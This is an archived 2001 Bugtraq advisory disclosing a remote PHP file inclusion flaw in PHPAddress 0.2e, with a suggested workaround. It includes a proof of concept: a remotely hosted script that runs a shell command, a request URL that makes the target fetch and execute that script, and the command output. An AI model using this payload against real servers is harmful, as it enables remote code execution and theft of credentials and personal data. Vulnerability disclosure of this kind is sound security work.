[25824] in bugtraq
PHP source injection in PHPAddress
daemon@ATHENA.MIT.EDU (tim vandermeersch)
Mon Jun 17 18:52:32 2002
Message-ID: <00fa01c18dc4$785b99a0$01000001@tim>
From: "tim vandermeersch" <tim.vandermeersch@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Wed, 26 Dec 2001 05:19:11 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
PHP source injection in PHPAddress
Description
PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaing a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/
Workaround
Change the global.php3 file so it looks like this:
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch
(chu@informatik.tu-chemnitz.de)
$LanCookie = ""; // THIS LINE
if ($LangCookie)
require("$LangCookie.php3"); // Line 5
...
Tested version
PHP Address 0.2e (09.12.2001)
The Problem
Any user who requests an url like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
able to include any file he wants.
Example
I putted a PHP script on my server wich I wanted to include:
------------x.php3------------
<?
passthru("/bin/ls /");
?>
-------------------------------
then i requested this url:
http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is allready there look at line 5 in global.php3)
------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var
------------------------------
Note that any PHP code could be included, malicious users could get access
to database
passwords, personal information, ...
------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
